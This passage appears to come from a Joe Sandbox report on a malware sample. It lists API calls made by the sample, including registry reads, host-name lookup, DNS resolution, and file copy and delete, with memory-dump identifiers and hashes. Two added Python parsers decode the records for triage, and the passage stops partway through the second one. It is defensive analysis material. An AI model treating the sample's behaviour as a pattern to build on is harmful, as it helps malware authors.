                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: 1736892346793bf5dfdc92e2bd7197f83a8aac4353209699b881790a5201b2bb
                                                                                                                                                                        • Instruction ID: 15967768c3bec79c77eef2f9b717003dcd37d7e4a107544feb5fa1328a83afd1
                                                                                                                                                                        • Opcode Fuzzy Hash: 1736892346793bf5dfdc92e2bd7197f83a8aac4353209699b881790a5201b2bb
                                                                                                                                                                        • Instruction Fuzzy Hash: D7F06D74200314AFD310DB26EC8AC573BBEFB9930EB024069F9018B252E6B1EC00CE60
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 5ef6ed49f54dd764d65f4abca506ddd6ec1c4f2b24b990de35ae79443200b4aa
                                                                                                                                                                        • Instruction ID: 56b75990d9a77004b48ee4320934ccf1fffa3b3f4c17f91b25b24eb866be129b
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ef6ed49f54dd764d65f4abca506ddd6ec1c4f2b24b990de35ae79443200b4aa
                                                                                                                                                                        • Instruction Fuzzy Hash: 6EF0C271A05B019B8344EF3DCEC081A77A6BBC9264F45822CE85087362EB70A985CBD6
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119), ref: 00431970
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: 406c04a0fafd960eda2531e21e8686fd5a79a1be68b108506ace148a42c4fb82
                                                                                                                                                                        • Instruction ID: 8b5cb6cb0b6a19065321153dd039a9c6641393c5d5c34dd5c1e76fe346963b1a
                                                                                                                                                                        • Opcode Fuzzy Hash: 406c04a0fafd960eda2531e21e8686fd5a79a1be68b108506ace148a42c4fb82
                                                                                                                                                                        • Instruction Fuzzy Hash: F5F0BE72A40200AFC7209F3DDC49E663BB5EBCE304F958179F8809B261EAB05820CB51
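The function records above list raw API references such as `RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119)` and memory-dump identifiers whose fields encode the process, base address and page protection. The following decoder is an added example written for this page; it is not Joe Sandbox code and not part of the report. The Win32 constants it uses (HKEY roots, KEY_* access bits, PAGE_* protections) are the standard winreg.h/winnt.h values. The field layout assumed for the `.sdmp` names (pid, run, dump id, base, page protection, then three fields left undecoded) is inferred from the snapshot file name `hcaresult_15_2_400000_...` and labelled as an assumption in the code; the sample record embedded in the block is copied from the entries on this page.

```python
"""Decode the API-reference and memory-dump lines of a Joe Sandbox IDA-plugin
function record into a short triage summary (added example, not report code)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Standard winreg.h / winnt.h constants (not taken from the report).
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
              0x80000005: "HKEY_CURRENT_CONFIG"}
KEY_BITS = {0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY",
            0x0008: "KEY_ENUMERATE_SUB_KEYS", 0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK",
            0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY", 0x20000: "READ_CONTROL",
            0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE"}
# Composite rights are matched first so common masks read as one name.
KEY_COMPOSITES = [(0xF003F, "KEY_ALL_ACCESS"), (0x20019, "KEY_READ"), (0x20006, "KEY_WRITE")]
PAGE_PROTECTION = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

# "<func>.<module>(<hex args, '?' = unresolved>), ref: <call site>"
API_RE = re.compile(r"(?P<func>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# ASSUMPTION: <pid>.<run>.<dump id>.<base>.<page protection>.<3 undecoded fields>.sdmp,
# inferred from the snapshot name hcaresult_15_2_400000_... (pid 0xF, run 2, base 0x400000).
SDMP_RE = re.compile(r"(?P<pid>[0-9A-F]{8})\.(?P<run>[0-9A-F]{8})\.(?P<dump>\d+)\."
                     r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})(?:\.[0-9A-F]{8}){3}\.sdmp")


@dataclass
class ApiRef:
    func: str
    module: str
    args: list            # int per argument, or None where the plugin printed '?'
    ref: int              # address of the call site
    notes: list = field(default_factory=list)


def decode_key_access(mask: int) -> list:
    """Expand a samDesired mask: composites first, then any remaining single bits."""
    names = []
    for value, name in KEY_COMPOSITES:
        if mask & value == value:
            names.append(name)
            mask &= ~value
    for bit in sorted(KEY_BITS):
        if mask & bit:
            names.append(KEY_BITS[bit])
            mask &= ~bit
    if mask:                       # bits this table does not know
        names.append(f"0x{mask:X}")
    return names


def parse_api_line(line: str) -> Optional[ApiRef]:
    m = API_RE.search(line)
    if not m:
        return None
    args = []
    for a in m["args"].split(","):
        a = a.strip()
        if a:
            args.append(None if a == "?" else int(a, 16))
    ref = ApiRef(m["func"], m["module"], args, int(m["ref"], 16))
    if ref.func.startswith("RegOpenKeyEx") and len(ref.args) == 4:
        root, _, _, sam = ref.args
        if root in HKEY_ROOTS:
            ref.notes.append(f"hKey={HKEY_ROOTS[root]}")
        if sam is not None:
            ref.notes.append("samDesired=" + "|".join(decode_key_access(sam)))
    return ref


def parse_sdmp(name: str) -> Optional[dict]:
    m = SDMP_RE.search(name)
    if not m:
        return None
    prot = int(m["prot"], 16)
    return {"pid": int(m["pid"], 16), "run": int(m["run"], 16), "base": int(m["base"], 16),
            "protection": prot, "protection_name": PAGE_PROTECTION.get(prot, f"0x{prot:X}")}


def summarize_record(text: str) -> dict:
    """Collect decoded API calls and any dumped region that is writable and executable."""
    calls, wx = [], []
    for line in text.splitlines():
        api = parse_api_line(line)
        if api:
            calls.append(api)
            continue
        dump = parse_sdmp(line)
        if dump and dump["protection"] in (0x40, 0x80):
            wx.append(dump)
    return {"calls": calls, "wx_regions": wx}


# Lines copied from the function record above (the RegOpenKeyExA record at 00431970).
SAMPLE_RECORD = """\
• RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119), ref: 00431970
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
"""

if __name__ == "__main__":
    s = summarize_record(SAMPLE_RECORD)
    for c in s["calls"]:
        print(f"{c.func} @ {c.ref:08X}: {', '.join(c.notes)}")
    for r in s["wx_regions"]:
        print(f"pid {r['pid']} run {r['run']} base {r['base']:08X} {r['protection_name']}")
```

On the record above the decoder reports the open as `HKEY_LOCAL_MACHINE` with `KEY_READ|KEY_WOW64_64KEY`, i.e. the 32-bit sample explicitly asks for the 64-bit registry view rather than the WOW64-redirected one, and flags the region at 0x401000 as `PAGE_EXECUTE_WRITECOPY`, which is the page protection one expects to see when the code section is mapped writable.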
APIs
• getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 0041B07A
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: getaddrinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 300660673-0
                                                                                                                                                                        • Opcode ID: a3ef1f1283805c717f0143fef92db67404ed982ce865052be816f7286c622970
                                                                                                                                                                        • Instruction ID: 4987b4ea97daeb264945c28c2b368119fcf171c86cdb4a3003909ff6fc10ac06
                                                                                                                                                                        • Opcode Fuzzy Hash: a3ef1f1283805c717f0143fef92db67404ed982ce865052be816f7286c622970
                                                                                                                                                                        • Instruction Fuzzy Hash: 99F06DB1904344DFDB10DF28CD80B97B7E4FB85344F01C92AE84897202E7B5A984CB51
APIs
• GetComputerNameA.KERNEL32(00000000), ref: 004314B3
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
• Instruction ID: fbecf42e50bf32649b0f86ce1194af764c2ba67d61e8489f1122926f9e73325e
• Opcode Fuzzy Hash: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
• Instruction Fuzzy Hash: 84E06DB17021006FDB58DF2DDCD5F6B72ED9BC9254B0A4028F804D7361EA74AC10C669
APIs
• DeleteFileA.KERNEL32(00000000), ref: 00424FA2
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: bd1a9babada568bd145aa1a14cec0041467ae98d92957aebcb34fb612b8c4628
• Instruction ID: cfc07768c1fb41c6e3f6939334fee0d653a60b69caf7ad8e2d02eec98428f505
• Opcode Fuzzy Hash: bd1a9babada568bd145aa1a14cec0041467ae98d92957aebcb34fb612b8c4628
• Instruction Fuzzy Hash: 03F03ABA30A414EFD708CB1CDE98A58B3E5EF8930870860A8D941C7761E7F4EE51CA49
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041DEE6
• Note: the third argument is bFailIfExists = 1, so this copy fails instead of overwriting an existing destination file.
Memory Dump Source
• Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
Yara matches
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: 6b8a73052ebc37cb4aaf142216696b7bf04d85de6e58fb8cdb9bffb033e4ffbc
• Instruction ID: 4d1e15c73de2ae51dea474d51b2a98e21e4986c241943f8320a136693659ef18
• Opcode Fuzzy Hash: 6b8a73052ebc37cb4aaf142216696b7bf04d85de6e58fb8cdb9bffb033e4ffbc
• Instruction Fuzzy Hash: 3FF08CBAB012159FCB00CF28DC94A9A73F5FB98B00B044064E805E7364EBB0EE02CB90
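The function entries in this section all share one machine-generated shape: an API line carrying module, arguments and call-site address, the memory dump the function was lifted from, and the opcode and instruction IDs. The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed sample. It parses entries of that shape into records, decodes the WinINet dwFlags argument of an HttpOpenRequestA call and the protection field of the .sdmp source name, and rolls the API names up into triage labels. The sample input is constructed from the API lines in this section; reading the fourth and fifth dotted fields of the .sdmp name as region base and page protection is an assumption checked only against the values shown here (0x401000 with 0x80, 0x400000 with 0x02), and the capability labels are the example's own, not Joe Sandbox signature names.

```python
"""Parse Joe Sandbox 'Code Analysis' function entries into structured records.
Added example, not part of the report or the analysed sample; SAMPLE is
constructed from this section's API lines, interpretations are marked below."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# HttpOpenRequestA dwFlags bits (wininet.h).
WININET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
# Win32 page protection constants (winnt.h).
PAGE_PROTECTION = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
# Triage labels for the APIs in this section; the labels are this example's own.
CAPABILITY = {"GetComputerNameA": "host-fingerprinting", "getaddrinfo": "dns-resolution",
              "HttpOpenRequestA": "http-request", "CopyFileA": "file-copy",
              "DeleteFileA": "file-delete"}

API_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")

ApiCall = namedtuple("ApiCall", "name module args ref")  # ref = call-site address


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)


def parse_entries(text):
    """Start a new entry at each 'APIs' header; collect API lines and key/value lines."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
        elif line and current is not None:
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                current.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
            elif (m := KV_RE.match(line)) and m["key"] != "Associated":
                # "Download File" is link residue from the HTML report, not data.
                current.meta[m["key"]] = m["value"].replace("Download File", "").strip()
    return entries


def decode_flags(value, table):
    """(names, leftover): names of set bits known to table, leftover = unknown bits."""
    names = [n for bit, n in sorted(table.items(), reverse=True) if value & bit]
    known = sum(bit for bit in table if value & bit)
    return names, value & ~known & 0xFFFFFFFF


def http_open_request_flags(call):
    """dwFlags is HttpOpenRequestA's 7th argument; None when the report left it unresolved."""
    if call.name != "HttpOpenRequestA" or len(call.args) < 7 or call.args[6] == "?":
        return None
    return decode_flags(int(call.args[6], 16), WININET_FLAGS)


def dump_source_info(meta):
    """Interpret the .sdmp name. ASSUMPTION: dotted field 3 is the region base and
    field 4 the page protection, matching the report's 0x401000/0x80 and 0x400000/0x02."""
    parts = [p.strip() for p in meta["Source File"].split(",")]
    fields = parts[0].rsplit(".sdmp", 1)[0].split(".")
    prot = int(fields[4], 16)
    info = {"process": int(fields[0], 16), "base": int(fields[3], 16),
            "protection": PAGE_PROTECTION.get(prot, hex(prot))}
    for p in parts[1:]:
        if p.startswith("Offset:"):
            info["image_base"] = int(p.split(":", 1)[1], 16)
    return info


def capabilities(entries):
    """Sorted triage labels over every call in every entry."""
    return sorted({CAPABILITY.get(c.name, "other:" + c.name) for e in entries for c in e.calls})


# Constructed sample: one API line per entry, copied from this report section.
SAMPLE = """\
APIs
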